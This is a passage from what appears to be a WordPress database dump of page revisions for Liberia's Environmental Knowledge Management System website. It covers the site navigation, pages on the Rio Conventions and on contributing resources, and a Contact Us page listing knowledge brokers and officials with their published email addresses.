	\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:31:47','2019-11-27 20:31:47','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2870,1,'2019-11-27 20:56:56','2019-11-27 20:56:56','<h2>Conventions & Protocols</h2>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-768x386.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March 1994. Today, it...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio Earth Summit, the...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-27 20:56:56','2019-11-27 20:56:56','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(2871,1,'2019-11-27 20:59:42','2019-11-27 20:59:42','<h2>Conventions & Protocols</h2>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img width=\"1024\" height=\"514\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg\" alt=\"United Nations Framework Convention on Climate Change\" title=\"United Nations Framework Convention on Climate Change\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine.jpg 1024w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-768x386.jpg 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">United Nations Framework Convention on Climate Change</a>The United Nations Framework Convention on Climate Change (UNFCCC) entered into force on 21 March...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg\" alt=\"United Nations Convention to Combat Desertification\" title=\"United Nations Convention to Combat Desertification\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">United Nations Convention to Combat Desertification</a>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Learn More</a>\n										<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img width=\"1000\" height=\"554\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg\" alt=\"United Nations Convention on Biological Diversity\" title=\"United Nations Convention on Biological Diversity\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1.jpg 1000w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-768x425.jpg 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" /></a>					<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">United Nations Convention on Biological Diversity</a>The Convention on Biological Diversity – Signed by 150 government leaders at the 1992 Rio...<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Learn More</a>','Multilateral Environmental Agreements','','inherit','closed','closed','','84-revision-v1','','','2019-11-27 20:59:42','2019-11-27 20:59:42','',84,'https://ekmsliberia.info/84-revision-v1/',0,'revision','',0),(2874,1,'2019-11-27 22:30:27','2019-11-27 22:30:27','<h2>Contribute a knowledge resource to the EKMS</h2>		\n		<p>Ekmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener noreferrer\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.</p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia. If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.</p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.</p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener noreferrer\">‘Join the Community’</a> page.</p>','Contribute','','inherit','closed','closed','','74-revision-v1','','','2019-11-27 22:30:27','2019-11-27 22:30:27','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2875,1,'2019-11-27 22:31:54','2019-11-27 22:31:54','<h2>Contribute a knowledge resource to the EKMS</h2>		\n		<p>Ekmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener noreferrer\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.</p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia. If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.</p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.</p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener noreferrer\">‘Join the Community’</a> page.</p>		\n			<h2>Submission Forms:</h2>		\n		Coming soon!','Contribute','','inherit','closed','closed','','74-revision-v1','','','2019-11-27 22:31:54','2019-11-27 22:31:54','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2876,1,'2019-11-28 00:25:29','2019-11-28 00:25:29','<h2>Contribute a knowledge resource to the EKMS</h2>\nEkmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener noreferrer\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.\n\nWe are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia.&nbsp;If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.\n\nThis site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.\n\nTo learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener noreferrer\">‘Join the Community’</a> page.\n<h2>Submission Forms:</h2>\nComing soon!','Contribute','','inherit','closed','closed','','74-revision-v1','','','2019-11-28 00:25:29','2019-11-28 00:25:29','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2881,1,'2019-11-28 00:57:37','2019-11-28 00:57:37','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n			<!-- wp:jetpack/contact-form {\"subject\":\"Contact Form message\",\"to\":\"contact@ekmsliberia.info\",\"hasFormSettingsSet\":\"yes\",\"customThankyou\":\"message\"} -->\n<!-- wp:jetpack/field-name {\"required\":true} /-->\n<!-- wp:jetpack/field-email {\"required\":true} /-->\n<!-- wp:jetpack/field-select {\"required\":true,\"options\":[\"Documents (Policies Reports Case Studies Guides etc)\",\"Biodiversity\",\"Climate Change\",\"Desertification\",\"News or Blogs\",\"General Inquiry\"]} /-->\n<!-- wp:jetpack/field-textarea /--><!-- /wp:jetpack/contact-form -->		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 00:57:37','2019-11-28 00:57:37','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2882,1,'2019-11-28 00:59:02','2019-11-28 00:59:02','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><!-- wp:jetpack/contact-form {\"subject\":\"Contact Form message\",\"to\":\"contact@ekmsliberia.info\",\"hasFormSettingsSet\":\"yes\",\"customThankyou\":\"message\"} --></p><p><!-- wp:jetpack/field-name {\"required\":true} /--></p><p><!-- wp:jetpack/field-email {\"required\":true} /--></p><p><!-- wp:jetpack/field-select {\"required\":true,\"options\":[\"Documents (Policies Reports Case Studies Guides etc)\",\"Biodiversity\",\"Climate Change\",\"Desertification\",\"News or Blogs\",\"General Inquiry\"]} /--></p><p><!-- wp:jetpack/field-textarea /--><!-- /wp:jetpack/contact-form --></p>		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 00:59:02','2019-11-28 00:59:02','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2883,1,'2019-11-28 00:59:24','2019-11-28 00:59:24','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 00:59:24','2019-11-28 